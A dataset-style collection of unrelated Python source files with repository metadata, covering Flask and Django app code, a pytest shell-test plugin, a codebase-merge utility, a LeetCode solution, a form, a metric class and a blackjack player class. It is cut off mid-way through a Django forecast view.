6487e1a1c4dfff87252067d989fbc85849af01b3 | 486 | py | Python | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | backend/app/__init__.py | Polsaker/mateapp | 8dfce3b642e8b7a68e74f22864aad8cee5b65239 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request
import sys
from .models import db_wrapper
from .views.token import token
from .common import JWT
try:
import config
except ImportError:
print("ERROR: El archivo de configuración no existe!")
sys.exit(1)
app = Flask(__name__)
app.config.from_object('config')
# Inicialización de flaskdb
db_wrapper.init_app(app)
JWT.init_app(app)
# Inicialiación de todos los blueprint
app.register_blueprint(token, url_prefix='/token') | 21.130435 | 58 | 0.773663 | 71 | 486 | 5.126761 | 0.577465 | 0.049451 | 0.054945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002392 | 0.139918 | 486 | 23 | 59 | 21.130435 | 0.868421 | 0.127572 | 0 | 0 | 0 | 0 | 0.135071 | 0 | 0 | 0 | 0 | 0.043478 | 0 | 1 | 0 | false | 0 | 0.466667 | 0 | 0.466667 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
6489b2bf3f326b2bfc8410132de75ddbf7864318 | 1,059 | py | Python | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | conftest.py | fruch/pytest-shabang | b4a83386efebfedb415dcd7418cda77227cabc18 | [
"MIT"
] | null | null | null | import subprocess
import os.path
import sys
import pytest
def pytest_collect_file(parent, path):
if path.basename.startswith("test"):
return ShabangFile(path, parent)
class ShabangFile(pytest.File):
def collect(self):
yield ShabangItem(os.path.relpath(self.fspath), self, self.fspath)
class ShabangItem(pytest.Item):
def __init__(self, name, parent, filename):
super().__init__(name, parent)
self.filename = filename
def runtest(self):
subprocess.check_call(
str(self.filename), stdout=sys.stdout, stderr=sys.stderr, shell=True
)
def repr_failure(self, excinfo):
""" called when self.runtest() raises an exception. """
if isinstance(excinfo.value, subprocess.CalledProcessError):
return "\n".join(
[
"execution failed with",
" returncode: %r" % excinfo.value.returncode,
]
)
def reportinfo(self):
return self.fspath, 0, "file: %s" % self.name
| 26.475 | 80 | 0.609065 | 115 | 1,059 | 5.504348 | 0.486957 | 0.047393 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001311 | 0.279509 | 1,059 | 39 | 81 | 27.153846 | 0.828309 | 0.044381 | 0 | 0 | 0 | 0 | 0.051793 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0.035714 | 0.535714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
648e7a63b2bc50056b80cc23d240953bc125a6a5 | 735 | py | Python | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | marchena/modules/comments/managers.py | samuelmaudo/marchena | e9a522a9be66f7043aa61e316f7e733e8ccf1e32 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
from yepes.managers import (
NestableManager, NestableQuerySet,
SearchableManager, SearchableQuerySet,
)
class CommentQuerySet(NestableQuerySet, SearchableQuerySet):
"""
QuerySet providing main search functionality for ``CommentManager``.
"""
def published(self):
"""
Returns published comments.
"""
return self.filter(is_published=True)
class CommentManager(NestableManager, SearchableManager):
def get_queryset(self):
return CommentQuerySet(self.model, using=self._db)
def published(self, *args, **kwargs):
"""
Returns published comments.
"""
return self.get_queryset().published(*args, **kwargs)
| 22.96875 | 72 | 0.659864 | 64 | 735 | 7.515625 | 0.546875 | 0.049896 | 0.066528 | 0.12474 | 0.141372 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001761 | 0.227211 | 735 | 31 | 73 | 23.709677 | 0.84507 | 0.198639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0.083333 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6490265ebc2725dd0511e1b8509201139db524c1 | 1,283 | py | Python | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | Mac/scripts/bgenall.py | deadsnakes/python2.3 | 0b4a6871ca57123c10aa48cc2a5d2b7c0ee3c849 | [
"PSF-2.0"
] | null | null | null | # bgenall - Generate all bgen-generated modules
#
import sys
import os
import string
def bgenone(dirname, shortname):
os.chdir(dirname)
print '%s:'%shortname
# Sigh, we don't want to lose CVS history, so two
# modules have funny names:
if shortname == 'carbonevt':
modulename = 'CarbonEvtscan'
elif shortname == 'ibcarbon':
modulename = 'IBCarbonscan'
else:
modulename = shortname + 'scan'
try:
m = __import__(modulename)
except:
print "Error:", shortname, sys.exc_info()[1]
return 0
try:
m.main()
except:
print "Error:", shortname, sys.exc_info()[1]
return 0
return 1
def main():
success = []
failure = []
sys.path.insert(0, os.curdir)
if len(sys.argv) > 1:
srcdir = sys.argv[1]
else:
srcdir = os.path.join(os.path.join(sys.prefix, 'Mac'), 'Modules')
srcdir = os.path.abspath(srcdir)
contents = os.listdir(srcdir)
for name in contents:
moduledir = os.path.join(srcdir, name)
scanmodule = os.path.join(moduledir, name +'scan.py')
if os.path.exists(scanmodule):
if bgenone(moduledir, name):
success.append(name)
else:
failure.append(name)
print 'Done:', string.join(success, ' ')
if failure:
print 'Failed:', string.join(failure, ' ')
return 0
return 1
if __name__ == '__main__':
rv = main()
sys.exit(not rv) | 22.910714 | 67 | 0.67576 | 179 | 1,283 | 4.765363 | 0.430168 | 0.042204 | 0.046893 | 0.058617 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0.100821 | 0 | 0.009479 | 0.177709 | 1,283 | 56 | 68 | 22.910714 | 0.799052 | 0.092751 | 0 | 0.285714 | 1 | 0 | 0.086207 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.081633 | null | null | 0.102041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64aad382a45a9aa9391b084a3435e00b657beb09 | 517 | py | Python | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 23 | 2020-03-30T05:44:56.000Z | 2021-09-04T16:00:57.000Z | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 1 | 2020-05-10T15:04:05.000Z | 2020-06-14T01:21:44.000Z | code/672.py | Nightwish-cn/my_leetcode | 40f206e346f3f734fb28f52b9cde0e0041436973 | [
"MIT"
] | 6 | 2020-03-30T05:45:04.000Z | 2020-08-13T10:01:39.000Z | class Solution:
def flipLights(self, n, m):
"""
:type n: int
:type m: int
:rtype: int
"""
if n == 1:
return 1 if m == 0 else 2
if m == 0:
return 1
elif m & 1:
if m == 1:
return 3 if n <= 2 else 4
else:
return 4 if n <= 2 else 8
else:
if m == 2:
return 4 if n <= 2 else 7
else:
return 4 if n <= 2 else 8 | 24.619048 | 41 | 0.34236 | 70 | 517 | 2.528571 | 0.3 | 0.084746 | 0.090395 | 0.180791 | 0.310734 | 0.310734 | 0.225989 | 0.225989 | 0 | 0 | 0 | 0.094595 | 0.5706 | 517 | 21 | 42 | 24.619048 | 0.702703 | 0.071567 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64ad8ccc5514d0a8420bc454f99b90d120b796a0 | 206 | py | Python | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | help/help.py | Veetaha/python-lab1-purse | bf8e2e941f0722357eab33ce35d0e5ef2bbcbeeb | [
"MIT"
] | null | null | null | from os import path, system, name
def clear():
"""
Clear console function os-independent
:return: NoneType
"""
if name == 'nt':
system('cls')
else:
system('clear')
| 15.846154 | 41 | 0.548544 | 23 | 206 | 4.913043 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315534 | 206 | 12 | 42 | 17.166667 | 0.801418 | 0.271845 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.166667 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64ba23b72324586717117191e5924bd71bb76399 | 492 | py | Python | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | null | null | null | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | 1 | 2022-03-02T14:54:11.000Z | 2022-03-02T14:54:11.000Z | database_setup.py | mantoshkumar1/scrapy-practice | aa533f2cb768d97e7eb1fce7243ba51d47e5e7c5 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.engine.url import URL
from models import DeclarativeBase
from scrapers import settings
# Performs database connection using database settings from settings.py
# Variable type of engine: sqlalchemy engine
engine = create_engine(URL(**settings.DATABASE), echo=True)
def create_quotes_table(engine):
""""""
DeclarativeBase.metadata.create_all(engine)
if __name__ == "__main__":
create_quotes_table(engine)
| 25.894737 | 72 | 0.762195 | 59 | 492 | 6.101695 | 0.474576 | 0.077778 | 0.094444 | 0.127778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164634 | 492 | 18 | 73 | 27.333333 | 0.875912 | 0.227642 | 0 | 0 | 0 | 0 | 0.022663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
64c0972a1041309f76b4ed0085ed1b63f3b538e3 | 212 | py | Python | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 1 | 2018-01-26T21:18:12.000Z | 2018-01-26T21:18:12.000Z | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | 3 | 2017-12-09T14:49:30.000Z | 2017-12-09T14:59:39.000Z | lib/python/euler/fibonacci.py | xfbs/ProjectEulerRust | e26768c56ff87b029cb2a02f56dc5cd32e1f7c87 | [
"MIT"
] | null | null | null | import math
# phi - the golden ration
PHI = (1 + math.sqrt(5)) / 2
# the root of five, we need this a lot
ROOT5 = math.sqrt(5)
# returns the nth fibonacci number
def nth(n):
return round((PHI**n) / ROOT5)
| 16.307692 | 38 | 0.650943 | 38 | 212 | 3.631579 | 0.710526 | 0.115942 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036364 | 0.221698 | 212 | 12 | 39 | 17.666667 | 0.8 | 0.438679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
64c55a7d52cabc1c805230ca7439bdb0a588dbf9 | 8,580 | py | Python | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | 5 | 2016-05-08T00:55:46.000Z | 2020-03-14T06:57:30.000Z | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | null | null | null | moe/merge_codebases.py | cgruber/make-open-easy | b433ba61d2f7b32d06eb7df8db38ba545827ad5e | [
"Apache-2.0"
] | 10 | 2015-06-08T21:15:13.000Z | 2021-10-16T15:06:01.000Z | #!/usr/bin/env python
# Copyright 2010 Google Inc. All Rights Reserved.
"""Merges codebases.
When a change is made to either the generated or public codebase, and you want
to fold that into the other, you want to bring in that change, but *not* the
changes that made them different codebases to begin with. This is merging
the codebases. Merging takes a previous codebase, and the two current codebases
(generated and public), and creates the merged codebase. If the previous
codebase is public, the merged will be generated, and vice versa.
Usage:
merge_codebases --generated_codebase=<DIR>
--previous_codebase=<DIR> --public_codebase=<DIR>
Codebases may be either a directory, or a .tar or .zip file containing
the codebase.
Returns non-zero if unsuccessful merges.
"""
__author__ = 'dbentley@google.com (Dan Bentley)'
import os
import shutil
import subprocess
import sys
import tempfile
from google.apputils import app
import gflags as flags
import logging
from moe import base
from moe import moe_app
FLAGS = flags.FLAGS
class MergeCodebasesConfig(object):
"""Configuration to use for an examination of codebases."""
def __init__(
self,
generated_codebase, public_codebase,
previous_codebase):
"""Construct.
Args:
generated_codebase: codebase_utils.Codebase
public_codebase: codebase_utils.Codebase
previous_codebase: codebase_utils.Codebase
"""
self.generated_codebase = generated_codebase
self.public_codebase = public_codebase
self.previous_codebase = previous_codebase
self._Check()
def _Check(self):
"""Perform argument checking and expansion."""
if not self.generated_codebase:
raise app.UsageError('generated_codebase not set')
if not self.public_codebase:
raise app.UsageError('public_codebase not set')
if not self.previous_codebase:
raise app.UsageError('previous_codebase not set')
self.merged_codebase = tempfile.mkdtemp(
dir=moe_app.RUN.temp_dir, prefix='merged_codebase')
print ('Writing merged codebase to %s' %
self.merged_codebase)
class MergeCodebasesContext(object):
"""Context to examine codebases."""
def __init__(self, config):
"""Initialize MergeCodebasesContext.
Args:
config: MergeCodebasesConfig, configuration
"""
self.config = config
self.files = []
self.merged_files = []
self.failed_merges = []
def GenerateFiles(self):
"""Determine all the files to examine."""
file_list = []
file_set = set()
generated_files = self.config.generated_codebase.Walk()
for generated_file in generated_files:
file_list.append(generated_file)
file_set.add(generated_file)
public_files = self.config.public_codebase.Walk()
for public_file in public_files:
if public_file in file_set:
continue
file_list.append(public_file)
return file_list
def Update(self):
"""Entry point to examine codebases."""
files_to_merge = self.GenerateFiles()
self.files = files_to_merge
print 'COMPARING %d FILES:' % len(self.files)
print ' Generated Codebase: ', self.config.generated_codebase.Path()
print ' Public Codebase: ', self.config.public_codebase.Path()
print ' Previous Codebase: ', self.config.previous_codebase.Path()
print ' Merged Codebase:', self.config.merged_codebase
for f in files_to_merge:
self.GenerateMergedFile(f)
sys.stdout.write('\n')
sys.stdout.flush()
self.Report()
return bool(self.failed_merges)
def Report(self):
"""Print the final report."""
print ('Examined %d generated/public/previous files.' %
len(self.files))
if self.merged_files:
print ('%d required updating. First (up to) 10:' %
len(self.merged_files))
for f in self.merged_files[:10]:
print ' ', f
if self.failed_merges:
print ('%d were unsuccessful. First (up to) 5:' %
len(self.failed_merges))
for f in self.failed_merges[:5]:
print ' ', f
else:
print 'No merges required'
def GenerateMergedFile(self, f):
"""Generate the merged file for f."""
sys.stdout.write('.')
sys.stdout.flush()
generated_file = self.config.generated_codebase.FilePath(f)
public_file = self.config.public_codebase.FilePath(f)
previous_file = self.config.previous_codebase.FilePath(f)
merged_file = os.path.join(self.config.merged_codebase, f)
base.MakeDir(os.path.dirname(merged_file))
different = base.AreFilesDifferent(generated_file, public_file)
if not different:
shutil.copyfile(public_file, merged_file)
if base.IsExecutable(public_file):
base.SetExecutable(merged_file)
return
# TODO(dbentley): I probably need to think about executability
# So far, I've handled it in push_codebase but not here at all.
# This is probably a bug.
self.PerformMerge(public_file, previous_file, generated_file,
merged_file, f)
self.merged_files.append(f)
def PerformMerge(self, mod1_file, orig_file, mod2_file, output_file, f):
"""Merge changes.
Args:
mod1_file: str, path to the first modified file
orig_file: str, path to the original file
mod2_file: str, path to the second modified file
output_file: str, path to a file to write the file to.
f: str, relative filename of file being merged
Raises:
base.Error: if neither mod1_file nor mod2_file exists.
"""
# First, we deal with merging deleted files.
# merge(1) does not deal with this.
orig_exists = os.path.exists(orig_file)
mod1_exists = os.path.exists(mod1_file)
mod2_exists = os.path.exists(mod2_file)
orig_file = (orig_exists and orig_file) or '/dev/null'
mod1_file = (mod1_exists and mod1_file) or '/dev/null'
mod2_file = (mod2_exists and mod2_file) or '/dev/null'
if not (mod1_exists or mod2_exists):
raise base.Error('Neither %s nor %s exists' % (mod1_file, mod2_file))
if not orig_exists:
# the file was added
pass
else:
if not (mod1_exists and mod2_exists):
# the file previously existed, and now was deleted in one branch
existing_file = (mod1_exists and mod1_file) or mod2_file
if base.AreFilesDifferent(existing_file, orig_file):
# one branch wants to delete; another to modify.
# This is a failed merge. We note that it's a failed merge, and let
# it continue. This will call merge(1) with the previous file,
# an empty file, and the current, existing, modified file. This will
# create a merge error that we want, so the user can fix it.
self.failed_merges.append(f)
else:
# we want to delete the file; so we just don't output it
return
# NB(dbentley): merge takes the original file in the middle. Yes it looks
# weird, but it is correct.
process = subprocess.Popen(['merge', '-p', mod1_file, orig_file, mod2_file],
stdout=open(output_file, 'wb'))
# Handle executable bit
orig_exec = base.IsExecutable(orig_file)
mod1_exec = base.IsExecutable(mod1_file)
mod2_exec = base.IsExecutable(mod2_file)
if mod1_exec == mod2_exec:
output_exec = mod1_exec
else:
# This is clever. Explanation:
# The executable bits of the modified files differ.
# We should pick the one that differs from the original.
# Because these are booleans, we get that by negating the original.
output_exec = not orig_exec
if output_exec:
base.SetExecutable(output_file)
# From merge(1)'s man page:
# Exit status is 0 for no conflicts, 1 for some conflicts, 2 for trouble.
process.wait()
if process.returncode != 0:
self.failed_merges.append(f)
if process.returncode == 1:
logging.error('FAILED MERGE %s', output_file)
logging.debug(
'FAILED MERGE command: merge -p %s %s %s',
mod1_file, orig_file, mod2_file)
elif process.returncode == 2:
logging.error('Merge found "trouble" when merging: %s %s %s',
(mod1_file, orig_file, mod2_file))
elif process.returncode != 0:
logging.error('Merge returned status %d (outside of 0, 1, 2).',
process.returncode)
def main(unused_args):
print 'merge_codebases has no standalone mode'
print 'email moe-team@ if this is a problem'
sys.exit(1)
if __name__ == '__main__':
app.run()
| 33.255814 | 80 | 0.679371 | 1,166 | 8,580 | 4.845626 | 0.245283 | 0.029735 | 0.019823 | 0.011327 | 0.059823 | 0.043186 | 0.026549 | 0.016991 | 0.016991 | 0.016991 | 0 | 0.0094 | 0.231235 | 8,580 | 257 | 81 | 33.385214 | 0.84718 | 0.133683 | 0 | 0.082192 | 1 | 0 | 0.12039 | 0.004349 | 0 | 0 | 0 | 0.003891 | 0 | 0 | null | null | 0.006849 | 0.068493 | null | null | 0.09589 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64c83e170e74fdce7a961bc2d36cb3f925975895 | 2,018 | py | Python | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | 1 | 2022-01-22T06:33:38.000Z | 2022-01-22T06:33:38.000Z | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | null | null | null | app/forms/new_appointment.py | datascisteven/Queens-VA-SMS-Reminder-Project | 9dde2852a8fa63d150d9a4c610b9f8d57f7dbc19 | [
"Apache-2.0"
] | 1 | 2022-01-22T06:33:50.000Z | 2022-01-22T06:33:50.000Z | from flask_wtf import FlaskForm
from wtforms import StringField, DateTimeField, SelectField
from wtforms.validators import DataRequired, Length
from pytz import common_timezones
def _timezones():
return [(tz, tz) for tz in common_timezones][::-1]
# event_types = [('booked', 'Booked'),
# ('rescheduled', 'Rescheduled'),
# ('modified', 'Modified'),
# ('noshowed', 'No-Showed'),
# ('cancelled', 'Cancelled'),
# ('confirmed', 'Confirmed')]
times = ['0.25', '0.5', '1', '2', '12', '24', '48', '168']
def _intervals():
return [(hr, hr + ' hours') for hr in times]
class NewAppointmentForm(FlaskForm):
# event_type = SelectField(
# 'Event Type', choices=event_types, validators=[DataRequired()], default='booked'
# )
# event_time = DateTimeField(
# 'Appointment time', validators=[DataRequired()], format="%m-%d-%Y %I:%M%p", default=utcnow
# )
# patient_id = IntegerField('Patient ID', validators=[DataRequired(), Length(min=6)])
first = StringField(
'Patient First Name', validators=[DataRequired()])
last = StringField(
'Patient Last Name', validators=[DataRequired()])
mobile = StringField(
'Patient Mobile Number', validators=[DataRequired(), Length(min=10)])
# provider_id = IntegerField('Provider ID', validators=[DataRequired(), Length(min=6)])
dr_first = StringField(
'Provider First Name', validators=[DataRequired()])
dr_last = StringField(
'Provider Last Name', validators=[DataRequired()])
location = StringField(
'Appointment Location', validators=[DataRequired()])
interval = SelectField(
'Reminder Interval', choices=_intervals(), validators=[DataRequired()], default=48)
time = DateTimeField(
'Appointment Time', validators=[DataRequired()], format="%m-%d-%Y %I:%M%p")
timezone = SelectField(
'Appointment Timezone', choices=_timezones(), validators=[DataRequired()])
| 39.568627 | 100 | 0.633796 | 197 | 2,018 | 6.416244 | 0.375635 | 0.226266 | 0.082278 | 0.073576 | 0.158228 | 0.158228 | 0.10443 | 0.10443 | 0.10443 | 0.10443 | 0 | 0.014357 | 0.206145 | 2,018 | 50 | 101 | 40.36 | 0.774657 | 0.327056 | 0 | 0 | 0 | 0 | 0.153617 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0.071429 | 0.642857 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
64cba2f808f8129c5468822e716a045ca39e7b2a | 793 | py | Python | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | torchlight/modules/metrics.py | l3robot/torchlight | e9a809aad0b5e75f97bf0cb50c9c799ea7b98eab | [
"MIT"
] | null | null | null | import abc
import numpy as np
from sklearn.metrics import accuracy_score
class BaseMetric():
def __init__(self):
self.preds = []
self.targets = []
def append(self, preds, targets):
self.preds.extend(preds.data.cpu().numpy())
self.targets.extend(targets.data.cpu().numpy())
def reset(self):
self.preds = []
self.targets = []
def show(self):
return '{}: {:.4f}'.format(self.name, self.compute())
@abc.abstractmethod
def compute(self):
raise NotImplementedError
class AccuracyScore(BaseMetric):
def __init__(self):
super().__init__()
self.name = 'accuracy'
def compute(self):
preds = np.argmax(self.preds, axis=1)
return accuracy_score(preds, self.targets) | 21.432432 | 61 | 0.611602 | 91 | 793 | 5.175824 | 0.395604 | 0.11465 | 0.101911 | 0.089172 | 0.11465 | 0.11465 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.253468 | 793 | 37 | 62 | 21.432432 | 0.79223 | 0 | 0 | 0.32 | 0 | 0 | 0.02267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.04 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
b38ecd7c827d0395c200b4b2390413050257cd1c | 599 | py | Python | Exercises/Blackjack/player.py | Gwarglemar/PythonExercises | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
] | 1 | 2019-05-04T04:49:17.000Z | 2019-05-04T04:49:17.000Z | Exercises/Blackjack/player.py | Gwarglemar/Python | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
] | null | null | null | Exercises/Blackjack/player.py | Gwarglemar/Python | 3261892dea4d51b320cde2ce8a47e67a67609d30 | [
"MIT"
] | null | null | null | from person import Person
class Player(Person):
def __init__(self,starting_chips=100):
self.hand = []
self.chips = starting_chips
def show_hand(self):
output = "Player's hand: "
for card in self.hand:
output = output + str(card) + ' | '
print(output)
def remove_chips(self,qty):
if self.chips < qty:
self.chips = 0
else:
self.chips = self.chips - qty
def add_chips(self,qty):
self.chips += qty
def get_chip_total(self):
return self.chips | 23.96 | 48 | 0.534224 | 72 | 599 | 4.291667 | 0.416667 | 0.203884 | 0.116505 | 0.097087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010554 | 0.367279 | 599 | 25 | 49 | 23.96 | 0.804749 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.052632 | 0.052632 | 0.421053 | 0.052632 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
b3be5e4d32b31ac0089b95f2765e156e2d1976e1 | 1,235 | py | Python | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | app/owm_forecast/views.py | Valentin-Golyonko/FlaskTestRPi | b9796a9acb2bb1c122301a3ef192f43c857eb27b | [
"Apache-2.0"
] | null | null | null | from django.contrib.auth.mixins import LoginRequiredMixin
from rest_framework import status
from rest_framework.generics import GenericAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework.response import Response
from app.owm_forecast.models import Forecast
from config.settings import LOGOUT_REDIRECT_URL
class ForecastView(LoginRequiredMixin, GenericAPIView):
login_url = LOGOUT_REDIRECT_URL
renderer_classes = [TemplateHTMLRenderer]
template_name = 'forecast/forecast.html'
permission_classes = (IsAuthenticated,)
pagination_class = None
@staticmethod
def get(request, *args, **kwargs):
forecast_obj = Forecast.objects.filter(main_source=True).first()
if forecast_obj:
